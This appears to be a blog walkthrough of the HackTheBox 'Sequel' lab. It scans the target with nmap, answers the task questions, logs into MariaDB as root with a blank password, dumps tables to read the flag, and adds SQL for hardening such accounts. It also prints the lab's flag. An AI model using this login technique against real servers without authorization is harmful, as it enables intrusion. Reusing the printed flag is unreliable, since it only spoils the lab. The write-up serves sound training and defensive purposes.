Sequel is a really nice challenge by HackTheBox for practicing hacking skills. In this writeup we are going to dive into it.
Fire up your terminal and scan the target with nmap:
wesecure1337@kali:~$ nmap 10.129.95.232
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-28 16:06 IST
Nmap scan report for 10.129.95.232
Host is up (0.44s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE
3306/tcp open mysql

Nmap done: 1 IP address (1 host up) scanned in 54.74 seconds
From the scan results, the useful information is:
Host is up (0.44s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE
3306/tcp open mysql
If you have read our previous writeup of the Appointment Starting Point challenge, then you know the solution for Task 1; otherwise simply google "sql stands for" and you will get the answer.
TASK 1: What does the acronym SQL stand for?
Structured Query Language
As shown in the scan results, only one port, 3306, is open, and it is running mysql.
TASK 2: During our scan, which port running mysql do we find?
3306
MariaDB is a popular community-developed MySQL version.
TASK 3: What community-developed MySQL version is the target running?
MariaDB
If you have mysql installed on your system, simply type mysql --help as shown:
wesecure@kali:~$ mysql --help
You will get the entire help menu, which says:
wesecure@kali:~$ mysql --help
...
-u, --user=name User for login if not current user.
...
So from here we know that the flag -u is used to specify the username.
TASK 4: What switch do we need to use in order to specify a login username for the MySQL service?
-u
Using root as the username, one can log in to MariaDB without providing any password.
TASK 5: Which username allows us to log into MariaDB without providing a password?
root
If you have ever used SQL, then you know that * is used to represent all.
TASK 6: What symbol can we use to specify within the query that we want to display everything inside a table?
*
; is a very common symbol used in many languages like C, C++, Java, etc. to end a line; the same is the case with queries.
TASK 7: What symbol do we need to end each query with?
;
Now we are going to exploit the mysql service.
Let’s connect to the database:
wesecure1337@kali:~$ mysql -u root -p -h 10.129.95.232
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 73
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]>
Here -u specifies root as the username, -p prompts for the password (which is blank in this case), and -h gives the hostname, which is the IP address of the Sequel challenge. When prompted with Enter password:, just hit Enter and you will be logged in. Follow the steps below to get the flag.
MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| htb                |
| information_schema |
| mysql              |
| performance_schema |
+--------------------+
4 rows in set (0.284 sec)

MariaDB [(none)]> use htb;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [htb]> show tables;
+---------------+
| Tables_in_htb |
+---------------+
| config        |
| users         |
+---------------+
2 rows in set (0.221 sec)

MariaDB [htb]> select * from config;
+----+-----------------------+----------------------------------+
| id | name                  | value                            |
+----+-----------------------+----------------------------------+
|  1 | timeout               | 60s                              |
|  2 | security              | default                          |
|  3 | auto_logon            | false                            |
|  4 | max_size              | 2M                               |
|  5 | flag                  | 7b4bec00d1a39e3dd4e021ec3d915da8 |
|  6 | enable_uploads        | false                            |
|  7 | authentication_method | radius                           |
+----+-----------------------+----------------------------------+
7 rows in set (0.263 sec)

MariaDB [htb]>
show databases; is used to list the available databases.
use htb; is used to set the database to htb.
show tables; is used to see the tables inside the htb database.
select * from config; is used to see all available data in the config table.
So finally we found our flag.
SUBMIT FLAG: Submit root flag
7b4bec00d1a39e3dd4e021ec3d915da8
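The weakness this box relies on is a root account that accepts a blank password over the network, and it can be checked for and closed from the same MariaDB prompt. The statements below are an added example, not part of the original walkthrough; they assume the MariaDB 10.3 mysql.user layout (Password, plugin and authentication_string columns), an account named 'root'@'%', and a placeholder password.

```sql
-- Added example (not from the original writeup): audit and harden a MariaDB
-- server against the blank-password root login used above.
-- Assumes the MariaDB 10.3 mysql.user layout; run as an administrative user.

-- 1. List accounts that authenticate with an empty password.
--    Accounts using another plugin (e.g. unix_socket) are excluded because
--    they do not authenticate with the Password column.
SELECT User, Host, plugin
FROM mysql.user
WHERE Password = ''
  AND authentication_string = ''
  AND plugin IN ('', 'mysql_native_password');

-- 2. List accounts that can connect from hosts other than the server itself.
SELECT User, Host
FROM mysql.user
WHERE Host NOT IN ('localhost', '127.0.0.1', '::1');

-- 3. Close the hole. 'root'@'%' is an assumed account name; use the
--    User/Host pairs returned by the queries above.
--    Either give the account a strong password (placeholder shown) ...
ALTER USER 'root'@'%' IDENTIFIED BY '<REPLACE_WITH_STRONG_PASSWORD>';
--    ... or remove remote root entirely and administer locally:
-- DROP USER 'root'@'%';

-- 4. Confirm no passwordless account remains (expect an empty result set).
SELECT User, Host
FROM mysql.user
WHERE Password = ''
  AND authentication_string = ''
  AND plugin IN ('', 'mysql_native_password');
```

Setting bind-address = 127.0.0.1 in the server configuration also keeps port 3306 off the network when remote access is not needed.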
Voila!!! We have successfully solved the Sequel Starting Point challenge by HackTheBox. If you really enjoyed this writeup/walkthrough, then do check out our other writeups about related topics.
Let’s get connected
Twitter: proton_sec
GitHub: proton-sec
LinkedIn: protonsec
Thanks for Reading!!!